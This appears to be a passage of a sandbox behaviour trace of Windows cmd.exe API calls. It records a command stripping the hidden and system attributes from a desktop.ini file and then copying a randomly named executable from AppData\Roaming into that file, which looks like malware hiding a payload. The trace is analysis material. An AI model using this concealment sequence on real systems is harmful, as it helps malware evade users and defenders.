(lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0127.832] FindFirstFileW (in: 
lpFileName="C:\\Users", lpFindFileData=0x24f49c | out: lpFindFileData=0x24f49c) returned 0x440df0 [0127.832] FindClose (in: hFindFile=0x440df0 | out: hFindFile=0x440df0) returned 1 [0127.832] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x24f49c | out: lpFindFileData=0x24f49c) returned 0x440df0 [0127.832] FindClose (in: hFindFile=0x440df0 | out: hFindFile=0x440df0) returned 1 [0127.832] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x24f49c | out: lpFindFileData=0x24f49c) returned 0x440df0 [0127.832] FindClose (in: hFindFile=0x440df0 | out: hFindFile=0x440df0) returned 1 [0127.832] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0127.832] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0127.832] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0127.832] GetEnvironmentStringsW () returned 0x440610* [0127.833] FreeEnvironmentStringsW (penv=0x440610) returned 1 [0127.833] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0127.833] GetConsoleOutputCP () returned 0x1b5 [0127.833] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0127.833] GetUserDefaultLCID () returned 0x409 [0127.834] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0127.834] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x24f860, cchData=128 | out: lpLCData="0") returned 2 [0127.834] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x24f860, cchData=128 | out: lpLCData="0") returned 2 [0127.834] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x24f860, cchData=128 | out: lpLCData="1") returned 2 [0127.834] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, 
lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0127.834] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0127.834] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0127.834] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0127.834] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0127.834] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0127.834] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0127.834] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0127.835] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0127.835] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0127.835] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0127.836] GetConsoleTitleW (in: lpConsoleTitle=0x430bc0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0127.836] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0127.836] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0127.836] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0127.836] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0127.837] _wcsicmp (_String1="attrib", _String2=")") returned 56 [0127.837] _wcsicmp (_String1="FOR", _String2="attrib") returned 5 [0127.837] _wcsicmp (_String1="FOR/?", _String2="attrib") returned 5 [0127.837] _wcsicmp 
(_String1="IF", _String2="attrib") returned 8 [0127.837] _wcsicmp (_String1="IF/?", _String2="attrib") returned 8 [0127.837] _wcsicmp (_String1="REM", _String2="attrib") returned 17 [0127.837] _wcsicmp (_String1="REM/?", _String2="attrib") returned 17 [0127.840] _wcsicmp (_String1="del", _String2=")") returned 59 [0127.840] _wcsicmp (_String1="FOR", _String2="del") returned 2 [0127.840] _wcsicmp (_String1="FOR/?", _String2="del") returned 2 [0127.840] _wcsicmp (_String1="IF", _String2="del") returned 5 [0127.840] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0127.840] _wcsicmp (_String1="REM", _String2="del") returned 14 [0127.840] _wcsicmp (_String1="REM/?", _String2="del") returned 14 [0127.843] _wcsicmp (_String1="type", _String2=")") returned 75 [0127.843] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0127.843] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0127.843] _wcsicmp (_String1="IF", _String2="type") returned -11 [0127.844] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0127.844] _wcsicmp (_String1="REM", _String2="type") returned -2 [0127.844] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0127.929] SetErrorMode (uMode=0x0) returned 0x0 [0127.929] SetErrorMode (uMode=0x1) returned 0x0 [0127.929] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x440830, lpFilePart=0x24f014 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x24f014*="Desktop") returned 0x18 [0127.929] SetErrorMode (uMode=0x0) returned 0x1 [0127.930] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0127.930] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0127.935] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 
0x35 [0127.936] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x24ed90, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24ed90) returned 0xffffffff [0127.936] GetLastError () returned 0x2 [0127.936] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib", fInfoLevelId=0x1, lpFindFileData=0x24ed90, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24ed90) returned 0xffffffff [0127.936] GetLastError () returned 0x2 [0127.936] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x24ed90, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24ed90) returned 0x4426a0 [0127.936] FindClose (in: hFindFile=0x4426a0 | out: hFindFile=0x4426a0) returned 1 [0127.937] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x24ed90, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24ed90) returned 0xffffffff [0127.937] GetLastError () returned 0x2 [0127.937] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x24ed90, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24ed90) returned 0x4426a0 [0127.937] FindClose (in: hFindFile=0x4426a0 | out: hFindFile=0x4426a0) returned 1 [0127.937] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0127.937] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0127.937] GetConsoleTitleW (in: lpConsoleTitle=0x24f288, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0127.937] InitializeProcThreadAttributeList (in: lpAttributeList=0x24f110, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x24f1d8 | out: lpAttributeList=0x24f110, lpSize=0x24f1d8) returned 1 [0127.937] UpdateProcThreadAttribute (in: lpAttributeList=0x24f110, dwFlags=0x0, 
Attribute=0x60001, lpValue=0x24f1d0, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x24f110, lpPreviousValue=0x0) returned 1 [0127.937] GetStartupInfoW (in: lpStartupInfo=0x24f0cc | out: lpStartupInfo=0x24f0cc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0127.937] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0127.938] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\desktop.ini\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x24f16c*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\desktop.ini\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x24f1b8 | out: lpCommandLine="attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\desktop.ini\" ", lpProcessInformation=0x24f1b8*(hProcess=0x50, hThread=0x4c, dwProcessId=0x92c, dwThreadId=0x7cc)) returned 1 [0127.980] CloseHandle (hObject=0x4c) returned 1 [0127.980] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0127.980] GetEnvironmentStringsW () returned 0x440d58* [0127.980] FreeEnvironmentStringsW (penv=0x440d58) returned 1 [0127.980] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) 
returned 0x0 [0128.145] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x24f0ac | out: lpExitCode=0x24f0ac*=0x0) returned 1 [0128.145] CloseHandle (hObject=0x50) returned 1 [0128.146] _vsnwprintf (in: _Buffer=0x24f1f4, _BufferCount=0x13, _Format="%08X", _ArgList=0x24f0b8 | out: _Buffer="00000000") returned 8 [0128.146] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0128.146] GetEnvironmentStringsW () returned 0x4426f0* [0128.146] FreeEnvironmentStringsW (penv=0x4426f0) returned 1 [0128.146] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0128.146] GetEnvironmentStringsW () returned 0x4426f0* [0128.146] FreeEnvironmentStringsW (penv=0x4426f0) returned 1 [0128.146] DeleteProcThreadAttributeList (in: lpAttributeList=0x24f110 | out: lpAttributeList=0x24f110) [0128.146] GetConsoleTitleW (in: lpConsoleTitle=0x24f490, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0128.147] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x24e508, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x24e50c, nFileSystemNameSize=0x106 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x24e508*=0xff, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1 [0128.147] _wcsicmp (_String1="NTFS", _String2="FAT") returned 8 [0128.147] _wcsicmp (_String1="desktop.ini", _String2=".") returned 54 [0128.147] _wcsicmp (_String1="desktop.ini", _String2="..") returned 54 [0128.147] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\desktop.ini" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\nrwdon~1\\1vhpwy~1\\desktop.ini")) returned 0xffffffff [0128.147] GetLastError () returned 0x2 [0128.147] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1" (normalized: 
"c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\nrwdon~1\\1vhpwy~1")) returned 0x10 [0128.148] _wcsicmp (_String1="desktop.ini", _String2=".") returned 54 [0128.148] _wcsicmp (_String1="desktop.ini", _String2="..") returned 54 [0128.148] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\desktop.ini" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\nrwdon~1\\1vhpwy~1\\desktop.ini")) returned 0xffffffff [0128.148] GetLastError () returned 0x2 [0128.148] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\desktop.ini", fInfoLevelId=0x0, lpFindFileData=0x4439dc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4439dc) returned 0xffffffff [0128.148] GetLastError () returned 0x2 [0128.148] _get_osfhandle (_FileHandle=2) returned 0xb [0128.148] GetFileType (hFile=0xb) returned 0x2 [0128.148] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0128.148] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x24ef08 | out: lpMode=0x24ef08) returned 1 [0128.148] _get_osfhandle (_FileHandle=2) returned 0xb [0128.149] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x24ef3c | out: lpConsoleScreenBufferInfo=0x24ef3c) returned 1 [0128.149] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x40002712, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Could Not Find %1\r\n") returned 0x13 [0128.150] _get_osfhandle (_FileHandle=1) returned 0x7 [0128.150] _get_osfhandle (_FileHandle=1) returned 0x7 [0128.150] _get_osfhandle (_FileHandle=1) returned 0x7 [0128.150] GetFileType (hFile=0x7) returned 0x2 [0128.150] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0128.150] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x24f62c | out: lpMode=0x24f62c) returned 1 [0128.150] _dup (_FileHandle=1) returned 3 [0128.150] _close (_FileHandle=1) returned 0 [0128.151] _wcsicmp 
(_String1="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\desktop.ini", _String2="con") returned -53 [0128.151] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\desktop.ini" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\nrwdon~1\\1vhpwy~1\\desktop.ini"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x24f5fc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x50 [0128.151] _open_osfhandle (_OSFileHandle=0x50, _Flags=8) returned 1 [0128.151] GetConsoleTitleW (in: lpConsoleTitle=0x24f42c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0128.151] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe", fInfoLevelId=0x1, lpFindFileData=0x24ef90, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24ef90) returned 0x43e7e0 [0128.151] _wcsicmp (_String1="XEY8d7zI.exe", _String2=".") returned 74 [0128.152] _wcsicmp (_String1="XEY8d7zI.exe", _String2="..") returned 74 [0128.152] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe")) returned 0x2020 [0128.152] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x24de9c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x58 [0128.152] _open_osfhandle (_OSFileHandle=0x58, _Flags=8) returned 4 [0128.152] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.152] GetFileType (hFile=0x58) returned 0x1 [0128.152] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.152] GetFileSize (in: hFile=0x58, lpFileSizeHigh=0x24def4 | out: lpFileSizeHigh=0x24def4*=0x0) returned 0x7d600 
[0128.152] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.152] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0128.152] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.152] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.153] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.153] GetFileType (hFile=0x50) returned 0x1 [0128.153] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.153] GetFileType (hFile=0x50) returned 0x1 [0128.154] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.154] WriteFile (in: hFile=0x50, lpBuffer=0x24ed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.155] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.155] GetFileType (hFile=0x50) returned 0x1 [0128.155] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.155] WriteFile (in: hFile=0x50, lpBuffer=0x24ed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ed7c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.155] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.155] GetFileType (hFile=0x50) returned 0x1 [0128.155] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.155] WriteFile (in: hFile=0x50, lpBuffer=0x24edcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24edcc*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.155] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.155] GetFileType (hFile=0x50) returned 0x1 [0128.155] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.155] WriteFile (in: hFile=0x50, lpBuffer=0x24ee1c*, 
nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ee1c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.155] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.155] GetFileType (hFile=0x50) returned 0x1 [0128.155] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.155] WriteFile (in: hFile=0x50, lpBuffer=0x24ee6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ee6c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.156] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.156] GetFileType (hFile=0x50) returned 0x1 [0128.156] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.156] WriteFile (in: hFile=0x50, lpBuffer=0x24eebc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24eebc*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.156] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.156] GetFileType (hFile=0x50) returned 0x1 [0128.156] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.156] WriteFile (in: hFile=0x50, lpBuffer=0x24ef0c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ef0c*, lpNumberOfBytesWritten=0x24df10*=0x20, lpOverlapped=0x0) returned 1 [0128.156] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.156] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24defc | out: lpNewFilePointer=0x0) returned 1 [0128.156] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.156] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.156] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.156] GetFileType (hFile=0x50) returned 0x1 [0128.156] _get_osfhandle (_FileHandle=1) returned 0x50 
[0128.156] GetFileType (hFile=0x50) returned 0x1 [0128.156] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.156] WriteFile (in: hFile=0x50, lpBuffer=0x24ed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.156] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.156] GetFileType (hFile=0x50) returned 0x1 [0128.157] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.157] WriteFile (in: hFile=0x50, lpBuffer=0x24ed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ed7c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.157] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.157] GetFileType (hFile=0x50) returned 0x1 [0128.157] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.157] WriteFile (in: hFile=0x50, lpBuffer=0x24edcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24edcc*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.157] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.157] GetFileType (hFile=0x50) returned 0x1 [0128.157] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.157] WriteFile (in: hFile=0x50, lpBuffer=0x24ee1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ee1c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.157] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.157] GetFileType (hFile=0x50) returned 0x1 [0128.157] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.157] WriteFile (in: hFile=0x50, lpBuffer=0x24ee6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ee6c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.157] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.157] GetFileType (hFile=0x50) 
returned 0x1 [0128.157] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.157] WriteFile (in: hFile=0x50, lpBuffer=0x24eebc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24eebc*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.157] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.157] GetFileType (hFile=0x50) returned 0x1 [0128.158] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.158] WriteFile (in: hFile=0x50, lpBuffer=0x24ef0c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ef0c*, lpNumberOfBytesWritten=0x24df10*=0x20, lpOverlapped=0x0) returned 1 [0128.158] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.158] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24defc | out: lpNewFilePointer=0x0) returned 1 [0128.158] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.158] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.158] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.158] GetFileType (hFile=0x50) returned 0x1 [0128.158] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.158] GetFileType (hFile=0x50) returned 0x1 [0128.158] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.158] WriteFile (in: hFile=0x50, lpBuffer=0x24ed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.158] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.158] GetFileType (hFile=0x50) returned 0x1 [0128.158] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.158] WriteFile (in: hFile=0x50, lpBuffer=0x24ed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ed7c*, 
lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.158] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.158] GetFileType (hFile=0x50) returned 0x1 [0128.158] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.158] WriteFile (in: hFile=0x50, lpBuffer=0x24edcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24edcc*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.158] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.158] GetFileType (hFile=0x50) returned 0x1 [0128.158] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.158] WriteFile (in: hFile=0x50, lpBuffer=0x24ee1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ee1c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.159] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.159] GetFileType (hFile=0x50) returned 0x1 